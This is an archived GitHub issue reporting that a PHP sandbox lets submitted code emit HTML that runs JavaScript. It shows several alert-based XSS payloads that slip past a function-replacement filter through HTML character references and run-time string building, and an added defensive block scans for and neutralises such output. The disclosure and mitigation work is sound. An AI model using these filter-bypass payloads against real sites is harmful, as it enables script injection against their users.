This repository was archived by the owner on Mar 13, 2019. It is now read-only.

Inserting html code allows for javascript to be called #8

@NoRelect


The fact that you can insert custom HTML allows for the onload method to be used to execute JavaScript. Combining this with the escaped HTML chars, it also passes function replacement:

```php
?> <button onclick="alert&#40;&#34;Hacked&#34;&#41;">Click me for action</button> <?php
```

The same is also possible with the following:

```php
echo("<!DOCTYPE html><html><head>");
echo("<body onload=alert&#40;&#34;Hacked&#34;&#41;>");
```

It is also possible like this (unnecessary):

```php
$decoded = jks_string_html_cd("&#60;script&#62;alert(&#34;hacked&#34;)&#60;/script&#62;");
echo("<!DOCTYPE html><head></head><body>");
echo($decoded);
```

or like this:

```php
$m = "<pre>alert(^hacked^)</pre>";
$m = jks_string_repl("pre","script",$m);
$m = jks_string_repl("^","\"",$m);
echo("<!DOCTYPE html><head></head><body>");
echo($m);
```
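An added example, not code from this issue or from the project: one way to handle the output described above on the serving side is to parse what the sandboxed script printed, list the script elements and `on*` handlers with their decoded values, and render the output as escaped text under a script-blocking policy. The function names are hypothetical, the samples are constructed from the snippets in the issue, and the third sample is an assumption about what the `jks_*` snippets emit.

```php
<?php
// Added example, not part of the project: treat everything a sandboxed
// script prints as untrusted HTML. All function names are hypothetical.

/** List the places where $html would run JavaScript in a browser. */
function find_active_content(string $html): array
{
    if (trim($html) === '') {
        return [];
    }
    $doc = new DOMDocument();
    $previous = libxml_use_internal_errors(true); // tolerate sloppy markup
    $doc->loadHTML($html);
    libxml_clear_errors();
    libxml_use_internal_errors($previous);
    $findings = [];
    // The parser decodes character references in attribute values, so
    // alert&#40;&#34;Hacked&#34;&#41; is reported as alert("Hacked").
    foreach ((new DOMXPath($doc))->query('//script | //@*') as $node) {
        if (!($node instanceof DOMAttr)) {
            $findings[] = 'script: ' . trim($node->textContent);
        } elseif (stripos($node->nodeName, 'on') === 0) { // broad on* match
            $findings[] = "{$node->nodeName}: {$node->nodeValue}";
        }
    }
    return $findings;
}

/** Render the same output as inert text instead of markup. */
function render_as_text(string $html): string
{
    return '<pre>' . htmlspecialchars($html, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8') . '</pre>';
}

// Second layer: this policy blocks script elements and inline handlers.
if (!headers_sent()) {
    header("Content-Security-Policy: script-src 'none'");
}
$samples = [ // constructed from the snippets in the issue
    '<button onclick="alert&#40;&#34;Hacked&#34;&#41;">Click me for action</button>',
    '<!DOCTYPE html><html><head><body onload=alert&#40;&#34;Hacked&#34;&#41;>',
    // Assumed output of the last two snippets after the jks_* helpers run.
    '<!DOCTYPE html><head></head><body><script>alert("hacked")</script>',
];
foreach ($samples as $output) {
    echo implode('; ', find_active_content($output)), PHP_EOL;
    echo render_as_text($output), PHP_EOL;
}
```

The scan runs on the emitted output rather than the submitted source, because the last two snippets only assemble the `script` tag at run time.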
